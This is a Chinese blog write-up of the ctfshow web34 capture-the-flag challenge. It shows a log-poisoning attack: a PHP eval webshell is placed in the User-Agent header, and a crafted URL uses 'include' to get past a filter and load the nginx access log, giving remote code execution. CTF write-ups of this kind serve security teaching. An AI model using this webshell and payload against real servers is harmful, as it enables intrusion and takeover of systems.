Ctfshow web入门-web34 WP

最新推荐文章于 2023-04-20 20:34:39 发布
最新推荐文章于 2023-04-20 20:34:39 发布
阅读量241 收藏
点赞数
分类专栏: ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45427131/article/details/116953100
版权

web34的套路和web33一样,解题姿势也一样,当然也可以换一种解法,比如说日志包含、文件包含、data协议命令执行

日志包含解法:

首先查看preg_match函数过滤的参数

在这里插入图片描述

还是老套路,过滤括号,那么只能用不带括号的函数include了,include $_POST[a]
分号被过滤之后可以用?>代替

尝试包含日志
在这里插入图片描述

日志包含成功,接下来就是往日志写马了

用firefox访问然后burpsuite抓包,然后再user-agent里面输入一句话木马<?php eval($_POST[a]);?>,之后用文件包含连接

在这里插入图片描述

一句话木马写入后构造payload让蚁剑访问
构造

payload: 
http://00b3c059-9a33-4068-b0a3-968504b2f1ad.challenge.ctf.show:8080/?c=include%0a$_GET[a]?>&a=/var/log/nginx/access.log

在这里插入图片描述

连接成功,进入查看flag

在这里插入图片描述

在这里插入图片描述

chin”
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
ctfshow-web入门-命令执行
qq_43618536的博客
07-08 772
ctfshow-web入门-命令执行
《CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 880
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
ctfshow web入门 命令执行34-38
m0_62207170的博客
03-25 471
ctfshow web入门 命令执行34-38
CTFshow 命令执行 web34
Kradress的博客
10-29 103
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 04:21:29 # @email: [email protected] # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){
ctfshow web入门---文件执行 解题思路
qq_73767109的博客
04-20 777
ctfshow web入门(web29-web59)解题思路与方法
ctf.show的 node.js(web334-web342)
wanan的博客
09-30 485
ctf.show的 node.js(web334-web342)
ctfshow-命令执行-web34
weixin_43400535的博客
11-02 453
ctfshow-web34 文章目录ctfshow-web34题目描述:原理:审计:二、使用步骤1.引入库2.读入数据总结 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 04:21:29 # @email: [email protected]
ctfshow web(3,4)
m0_74119193的博客
02-23 450
但是使用不了伪协议是因为服务器为nginx再查看nginx的默认日志文件在/var/log/nginx/access.log
CtfHub-wpweb
最新发布
01-23
ctfhub平台webwp
web-wp-API
02-21
Adonis API应用程序 这是在AdonisJs创建API服务器的样板,它已预先配置。 人体分析仪 验证 CORS 清醒的ORM 迁移与种子 设置 使用adonis命令安装蓝图 adonis new yardstick --api-only 或手动克隆存储库,然后...
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
JavaWeb(35) : 在Web(34)基础上增加分页功能
HuashirenYty的博客
09-04 396
一、分页的原理 第N页/共M页 首页 上一页 1 2 3 4 5 6 7 8 9 10 下一页 尾页 分页的优点:只查询一页,不用查询所有页! 二、分页数据 页面的数据都是由Servlet传递来的! Servlet: 当前面:pageCode,pc;pc:如果页面没有传递当前页码,那么Servlet默认是第一页,或者按页面传递的来准! 总页数:totalPages,tp;tp:总记录...
Bugku-WEB-web34
fallingskies
01-06 240
进入题目,观察URL,显然存在文件包含。参考文件包含漏洞https://www.jianshu.com/p/3514f0fd79f7 考虑使用php伪协议读取源码 php://filter/read=convert.base64-encode/resource=需要读取的文件代码内容 应该是被过滤了,== F12查看源码 提示有一个upload.php页面 是一个文件上传页面,加上存在文件包含,考虑使用图片马。 随便找一张图片,用记事本打开,写入一句话 上传成功后访问图片..
CTFshow 命令执行 web32 33 34 35 36
ChenD的学习笔记
11-08 834
CTFshow 命令执行 web32 web33 web34 web35 web36
Ctfshow web入门-web43 WP
qq_45427131的博客
05-18 404
web43 查看原码: preg_match 过滤了cat指令,cat指令可以用nl tac等等代替 然后system()函数就是常规的命令执行,将输入的变量写入黑洞,这种情况老套路直接双写就可以了 关于双写:怕还是有小伙伴不懂,看不懂的小伙伴请看下表 2>/dev/null 意思就是把错误输出到“黑洞” >/dev/null 2>&1 默认情况是1,也就是等同于1>/dev/null 2>&1。意思就是把标准输出重定向到“黑洞”,还把错误输出
ctfshow-Web入门-29~36wp
yutianovo的博客
09-05 1869
Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数 了解 eval函数之后 传入 ?c=echo "Y2my";?>ctf <?php system('ls');
Ctfshow Web入门 命令执行 Web31-74
qq_45427131的博客
10-21 2470
CtfShow Web入门-命令执行 感谢Y4师傅!看Y4的Wp真的学到好多! Web31 过滤条件: flag\system\php\cat\sort\shell\小数点\空格\单引号 执行passthru()查看flag 绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl*} %20 flag绕过可以用通符代替 执行echo查看flag echo
ctfshow web 电子取证
08-21
根据提供的引用内容,我了解到在ctfshow web电子取证,分别得到了三个flag。的flag是ctfshow{e6ad8304cdb562971999b476d8922219},的flag是ctfshow{af5b5e411813eafd8dc2311df30b394e},的flag是ctfshow{5526710eb3ed7b4742232d6d6f9ee3a9}。这些flag可能是通过对Web上的电子证据进行分析和取证获得的。具体的取证过程和相关技术可能需要更多的背景信息才能进行详细的讨论。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow终极考核wp](https://blog.csdn.net/weixin_46270220/article/details/122543062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值